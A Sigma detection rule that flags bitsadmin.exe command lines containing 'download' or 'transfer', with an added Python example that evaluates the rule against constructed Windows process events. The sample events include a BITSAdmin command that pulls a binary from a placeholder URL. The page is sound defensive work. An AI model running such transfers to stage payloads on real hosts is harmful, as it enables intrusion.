BITSAdmin Downloading Malicious Binaries
Detects usage of BITSAdmin to download malicious code. Inspired by the 2022 Red Canary Threat Detection report.
Sigma rule

```yaml
title: BITSAdmin Downloading Malicious Binaries
id: c7568c9e-f6c6-4cb7-a3c0-da356aef51d8
status: experimental
description: Detects usage of BITSAdmin to download malicious code. Inspired by the
  2022 Red Canary Threat Detection report.
references:
  - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
  - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md#atomic-test-9---windows---bitsadmin-bits-download
author: Micah Babinski
date: 2022/11/03
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\bitsadmin.exe'
    CommandLine|contains:
      - 'download'
      - 'transfer'
  condition: selection
falsepositives:
  - Unknown
level: high
```
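To show what the selection above actually fires on, here is an added Python re-implementation of the rule's matching logic run over a few constructed process_creation events; this is example code written for this page, not part of the Sigma project, and the hosts, paths and URLs in the sample events are fictional.

```python
"""Evaluate the BITSAdmin Sigma rule against constructed process_creation events.

Added example, not code from the Sigma project. It mirrors the rule:
Image must end with '\\bitsadmin.exe' AND CommandLine must contain
'download' OR 'transfer' (a list under one Sigma field is OR-ed).
"""

IMAGE_SUFFIX = "\\bitsadmin.exe"
COMMANDLINE_SUBSTRINGS = ("download", "transfer")


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies `condition: selection`.

    Sigma string comparisons are case-insensitive by default, so both the
    field values and the rule strings are lower-cased before comparing.
    """
    image = str(event.get("Image", "")).lower()
    cmdline = str(event.get("CommandLine", "")).lower()
    if not image.endswith(IMAGE_SUFFIX.lower()):
        return False
    return any(s in cmdline for s in COMMANDLINE_SUBSTRINGS)


# Constructed sample events (fictional telemetry, not from a real host).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 https://example.invalid/a.bin C:\Users\Public\a.bin"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /list /allusers"},          # no download/transfer: quiet
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p -s BITS"},     # BITS service host, not bitsadmin.exe
    {"Image": r"C:\Windows\SysWOW64\BITSADMIN.EXE",
     "CommandLine": "BITSADMIN.EXE /create /download job2"},  # mixed case still matches
]


def alerts(events) -> list:
    """Return the CommandLine of every event the rule fires on."""
    return [e["CommandLine"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    for line in alerts(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Note that the second event shows why the CommandLine clause matters: bitsadmin.exe running on its own is not enough, only job creation or transfer keywords trigger the rule.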